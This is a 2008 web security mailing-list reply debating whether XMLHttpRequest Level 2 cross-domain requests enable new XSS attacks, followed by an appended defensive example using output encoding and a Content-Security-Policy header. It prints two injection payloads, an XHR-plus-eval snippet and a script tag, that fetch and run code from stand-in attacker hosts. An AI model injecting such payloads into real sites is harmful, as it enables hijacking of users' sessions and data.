RE: [WEB SECURITY] A reflection about XMLHttpRequest Level 2
- From: "Hoffman, Billy" <billy.hoffman@xxxxxx>
- Subject: RE: [WEB SECURITY] A reflection about XMLHttpRequest Level 2
- Date: Sun, 16 Mar 2008 11:04:08 +0000
>From Blog:
--------
In my opinion, this feature allows an attacker to create within 10 lines of Javascript code a full MITM (Man In The Middle) attack.
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://www.attacker.com/mitm", true);
xhr.onreadystatechange = function(){
    if ( xhr.readyState == 4 && xhr.status == 200)
        eval(xhr.responseText)
};
xhr.send(null);
He can deploy this MITM simply by using a common XSS method.
----------
The vector you are describing makes no sense. An attacker injects 10 lines of JavaScript into a site, to contact a 3rd party web server, to pull down and execute JavaScript in the context of the original domain? The attacker already can execute script in the context of the original domain, BECAUSE HE CAN INJECT JAVASCRIPT!
So Yeah, I can do what you are describing above, and it only takes 1 line of HTML, and it also works on every browser from NetScape 2+ and IE 3+.
<script src=http://evil.com/Antons-xss-proxy/></script>
Billy
From: application.secure application.secure [mailto:application.secure@xxxxxxxxx]
Sent: Friday, February 29, 2008 2:21 PM
To: websecurity@xxxxxxxxxxxxx
Subject: [WEB SECURITY] A reflection about XMLHttpRequest Level 2
Hello to all,
I've read some stuff about the new feature available in the XMLHttpRequest Level 2 W3C first Draft: cross-domain requests (supported by Firefox 3).
I've tested this feature in FF3 and I've written some lines about the subject.
See it @ http://applicationsecure.blogspot.com
Thanks for your feedback (questions on my blog). I don't understand how a Web standard like W3C opens such a security hole...
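The defensive consequence of Billy's argument, as an added example that comes from neither poster: both vectors in the thread (the XHR-plus-eval snippet and the one-line script tag) only run if untrusted text reaches the page unencoded, so the control that matters is HTML-context encoding at the injection point, with a Content-Security-Policy header as defence in depth. The payload strings are constructed from the thread; renderGreeting and containsScriptTag are hypothetical helpers.

```javascript
// Added example, not code from the mailing list or the blog it quotes.

// The two vectors from the thread, used here as constructed untrusted input.
const XHR_PAYLOAD =
  '<script>var xhr=new XMLHttpRequest();' +
  'xhr.open("GET","http://www.attacker.com/mitm",true);' +
  'xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200)' +
  'eval(xhr.responseText)};xhr.send(null);</script>';
const SCRIPT_SRC_PAYLOAD = '<script src=http://evil.com/Antons-xss-proxy/></script>';

// Encode the five characters that matter in an HTML text or attribute context.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Crude check used only to demonstrate the point: does a <script ...> tag survive?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Hypothetical page handler that reflects a user-supplied value. Returns the
// headers and body as an object so the result can be inspected in a test.
function renderGreeting(name) {
  const body = `<p>Hello, ${escapeHtml(name)}</p>`;
  return {
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      // Defence in depth: if encoding is forgotten elsewhere, this policy blocks
      // inline script, off-site script and cross-origin XHR alike.
      'Content-Security-Policy': "default-src 'self'; script-src 'self'; connect-src 'self'",
    },
    body,
  };
}
```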
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Brought to you by http://www.webappsec.org